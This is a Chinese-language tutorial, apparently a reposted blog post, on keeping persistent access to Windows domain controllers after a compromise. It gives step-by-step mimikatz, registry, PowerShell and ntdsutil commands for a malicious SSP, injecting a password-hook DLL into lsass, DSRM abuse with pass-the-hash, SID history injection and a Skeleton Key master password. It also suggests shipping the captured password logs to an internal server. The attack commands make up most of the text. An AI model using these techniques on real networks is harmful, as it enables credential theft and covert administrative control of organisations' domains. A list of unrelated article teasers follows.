内网渗透之权限维持-域控后门-SSPHOOKDSRMSIDSkeleton-Key

news2024/11/25 23:25:07

权限维持-基于验证DLL加载-SSP

方法一:但如果域控制器重启,被注入内存的伪造的SSP将会丢失。
mimikatz

privilege::debug
misc::memssp

在这里插入图片描述
C:\Windows\System32\mimilsa.log 记录登录的账号密码
在这里插入图片描述

方法二:使用此方法即使系统重启,也不会影响到持久化的效果。
1.把mimiakatz下的mimilib.dll 放到目标域控的c:\windows\system32\目录下
2.修改注册表,重启生效
查询

reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

修改

reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ

在这里插入图片描述
c:\windows\system32\kiwissp.log 记录账号密码文件
在这里插入图片描述
这两种方法配合使用效果更好,可以把密码账号文件发到内网一台web服务器或邮件服务器,方便即使获取账号密码

权限维持-基于验证DLL加载-HOOK

方法一

powershell
Import-Module .\Invoke-ReflectivePEInjection.ps1
Invoke-ReflectivePEInjection -PEPath HookPasswordChange.dll -procname lsass
或把HookPasswordChange.dll放到域控中,下面的脚本包含上面两条命令。所以直接运行即可
.\HookPasswordChangeNotify.ps1

在这里插入图片描述
方法二

powershell -exec bypass -Command "& {Import-Module 'C:\Invoke-ReflectivePEInjection.ps1';Invoke-ReflectivePEInjection -PEPath C:\HookPasswordChange.dll -procname lsass}"

报错解决:

powershell
Set-ExecutionPolicy
unrestricted

修改密码后可触发记录密码操作
文件位置c:/windows/temp/password.txt
在这里插入图片描述

权限维持-基于机制账号启用-DSRM

1.获取dsrm及krbtgt的NTLM hash

privilege::debug
lsadump::lsa /patch /name:krbtgt
token::elevate
lsadump::sam

在这里插入图片描述
2.dsrm&krbtgt&NTLM hash同步

NTDSUTIL    #打开ntdsutil
set DSRM password  #修改DSRM的密码
sync from domain account krbtgt     #使DSRM的密码和指定域用户的密码同步
q            (第1次)#退出DSRM密码设置模式
q            (第2次)#退出ntdsutil

在这里插入图片描述
失败的话启用krbtgt账户(域管理中心-users)修改用户账号密码永不过期即可
3.修改dsrm登录方式

powershell
New-ItemProperty "hklm:\system\currentcontrolset\control\lsa\" -name "dsrmadminlogonbehavior" -value 2 -propertyType DWORD

在这里插入图片描述

4.利用PTH传递攻击

privilege::debug
sekurlsa::pth /domain:owa2010cn-god /user:administrator /ntlm:b097d7ed97495408e1537f706c357fc5
之后会弹出一个cmd
dir \\owa2010cn-god\c$

在这里插入图片描述
或使用psexec,wmiexec进行pth攻击(域名没成功,主机名成功,按理来说应该都可以)

psexec.exe  owa2010cn-god/administrator@192.168.3.21 -hashes 
:b097d7ed97495408e1537f706c357fc5

在这里插入图片描述

技术总结:
利用系统自带机制模式DSRM,修改DSRM默认登录方式和属性,通过其同步krgtgt进行PTH攻击,实现持续化控制,但适用于系统=>windows server2008。每个域控制器都有本地管理员账号和密码(与域管理员账号和密码不同)。DSRM账号可以作为一个域控制器的本地管理员用户,通过网络连接域控制器,进而控制域控制器。

权限维持-基于用户属性修改-SID history

1.获取某用户SID属性:
powershell

Import-Module ActiveDirectory
Get-ADUser webadmin -Properties sidhistory

在这里插入图片描述

2.给予某用户administrator属性:
mimiakatz

privilege::debug
sid::patch
sid::add /sam:webadmin /new:administrator

在这里插入图片描述
3.测评给与前后的DC访问权限:

dir \\192.168.3.21\c$

在这里插入图片描述
技术总结:
把域控管理员的SID加入到 其他某个 恶意的域账户的SID History中,然后,这个恶意的(我们自己创建的)域账户就可以域管理员权限访问域控了,不修改域账户一直存在,和直接加入域管理员组不一样,在用户和组中看不到域成员有管理员权限

权限维持-基于登录进程劫持-Skeleton Key(万能密码)

1、测试域内某个用户与DC通讯

dir \\owa2010cn-god\c$

2、连接DC后,DC注入lsass进程
mimikatz:

privilege::debug
misc::skeleton

在这里插入图片描述
3.重新测试域内某个用户与DC通讯

net use \\owa2010cn-god\ipc$ "mimikatz" /user:god\administrator
dir \\owa2010cn-god\c$

在这里插入图片描述
技术总结:
如果ip地址失败,就使用计算机名
因为Skeleton Key技术是被注入到lsass.exe进程的,
所以它只存在内存中,如域控重启,万能密码将失效

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/525594.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Plus and Multiply

题目: 题意解析: 有一个无穷大的正整数集合 S,该集合按下面所述方法生成: 数字 1 在集合 S 中。 若数字 x 在该集合中,那么数 xa 和数 xb 均在集合 S 中。(其中 a 与 b 为给定常数) 现在给出…

快速创作攻略:10分钟让你实现从文章撰写到多平台发布,支持公众号、B站、微博、知乎、头条等20种

快速创作攻略:10分钟让你实现从文章撰写到多平台发布,支持公众号、B站、微博、知乎、头条等20种 很多文字内容创作者, 想分享一个idea, 想介绍一个工具, 想分享经验或知识。 常碰到以下难题: 有个灵感但是要…

神经网络的基本概念、架构和训练方法

神经网络是一种由多个神经元按照一定的拓扑结构相互连接而成的计算模型。其灵感来自于人类大脑中神经元之间的相互作用。 在过去的几十年里,神经网络一直是人工智能领域中的热门研究方向之一。随着深度学习的兴起,神经网络的应用越来越广泛。本文将详细…

目标检测经典论文精读-R-CNN

目标检测经典论文精读-R-CNN R-CNN基本原理产生候选框-Selective Search 论文链接: https://www.cv-foundation.org/openaccess/content_cvpr_2014/papers/Girshick_Rich_Feature_Hierarchies_2014_CVPR_paper.pdf 论文技术报告链接: https://arxiv.org/…

无热图不组学!高阶文献热图R语言绘制小专场拿捏

一、概述 近在阅读近五年的一区高分的机器学习文献,其中有一种图出现频率特别高——热图。《Machine Learning and the Future of Cardiovascular Care: JACC State-of-the-Art Review》 《Comparison of Machine Learning Methods for Predicting Outcomes After…

阿里云服务器可以干嘛?ChatGPT等12件小事

拥有一台阿里云服务器可以用来做什么?ChatGPT最近很火,可以在云服务器上部署本地ChatGPT,搭建个人博客、企业网站,学习Linux、跑Python爬虫等,阿里云服务器网分享使用阿里云服务器用途的12件小事: 阿里云服…

cda星型模式、星座模式和雪花模式是什么鬼,怎么记

一、星型模式、雪花模式、星座模式的英文 星型模式 star schema 雪花模式 snowflake schema 二、形象记忆三种模式 星型模式,就像海绵宝宝里面的派大星,它长了多只手,每只手都抓着一个人。注意!只有一个派大星(只有…

高精度_加减乘除(理论+模板+例题)

👂 Rush E (Impossible Version) - Sheet Music Boss - 单曲 - 网易云音乐 👂 My Favorite Things - 羊毛とおはな - 单曲 - 网易云音乐 目录 🌼前言 🌼理论 🌼理论结合题目 🏆1088: 大整数加法 &am…

Android Jetpack之Room数据库的使用(Kotlin+Room)

作者:舒呐 一、基本介绍 Room 持久性库在 SQLite 上提供了一个抽象层,以便在充分利用 SQLite 的强大功能的同时,能够流畅地访问数据库。具体来说,Room 具有以下优势: 针对 SQL 查询的编译时验证。可最大限度减少重复…

django ORM框架(操作数据库)

一、ORM框架介绍 ORM框架,把类和数据进行映射,通过类和对象操作它对应表格中的数据,进行增删改查(CRUD) ORM框架中 数据库:需要提前手动创建数据库 数据表:与OMR框架中的模型类对应 字段:模…

阿里云,又瘫了!

大家好,我是老杨。 不知道你对前段时间,阿里云瘫痪的事情有印象不? 12月18号,阿里云发生了大规模服务中断的事情——主要是阿里云香港Region可用区C发生大规模服务中断事件。 中断也不是第一次了,但引起我注意的是&…

面向对象技术

面向对象技术 面向对象基础 面向对象基本概念 面向对象分析 面向对线设计 面向对象测试 UML 事务 关系 图 设计模式 创建型设计模式 结构型设计模式 行为型设计模式 面向对象基本概念 面向对象基本概念 达成目标具体需要做哪些事情。 对象 : 基本的运行实体,为类的实…

Vector - CAPL - CANoe硬件配置函数 - 05

目录 resetCan -- 重置CAN控制器 代码示例 ResetCanEx -- 重置CAN控制器的特定CAN通道 代码示例 ScanBaudrateActive -- 特定通道设置波特率 ScanBaudratePassive -- 开始扫描并检测给定通道上的波特率 resetCan -- 重置CAN控制器 功能:重置CAN控制器&#xf…

(2020)End-to-end Neural Coreference Resolution论文笔记

2020End-to-end Neural Coreference Resolution论文笔记 Abstract1 Introduction2 Related Work3 Task4 Model4.1 Scoring Architecture4.2 Span Representations5 Inference6 Learning7 Experiments7.1 HyperparametersWord representationsHidden dimensionsFeature encoding…

学习HCIP的day.06

十一、OSFP扩展知识点 1、关于OSPF状态机的问题 (1)在MA网络中(要进行DR/BDR选举)存在7种状态机,init是路由器A收到邻居B的hello包,但该hello包中没有A的RID; (2)在点到…

汽车EEA架构演进以及域控制器发展介绍

1、重要名词解析 (1)SDV:软件定义汽车; (2)SOA :一种 C/S 架构的软件设计方法; (3)OTA:空中下载技术(Over-the-Air Technology&#x…

【MySql】数据库事务

事务 事务事务的操作事务并发处理可能出现的问题隔离级别MVCC:多版本并发控制 事务 事物本质上指一条 sql 语句或一组 sql 组合 事务的特性:ACID 1、原子性:一个事务,要么一次性完成,要么就不做 2、一致性&#xff1…

STM32驱动超声波+OLED显示,并上传数据到云端(ONENET)

本文将介绍如何使用STM32F103C8T6单片机和HC-SR04超声波测距模块来实现测距功能,并通过0.96寸OLED屏幕显示测距结果。 首先,我们需要了解一下HC-SR04超声波测距模块的工作原理。该模块通过发送超声波脉冲并接收回波信号的时间来计算物体与模块之间的距离…

C++ STL 标准模板库介绍与入门

目录 1、概述 1.1、C 标准库 1.2、Boost库 2、STL 版本 2.1、HP 原始版本 2.2、P. J. 实现版本 2.3、RW 实现版本 2.4、SGI 实现版本 2.5、STLport 实现版本 3、STL 的六大组件 3.1、STL 六大组件构成 3.2、六大组件的交互关系 4、STL 的重要性 5、总结 VC常用功…

java spring MVC之RESTful快速开发

我这里有个一springboot项目 我在启动类同目录下创建了一个目录 目录名叫 controller 里面有一个UserController diam结构是这样的 package com.example.threshold.controller;import com.example.threshold.user; import org.springframework.stereotype.Controller; import…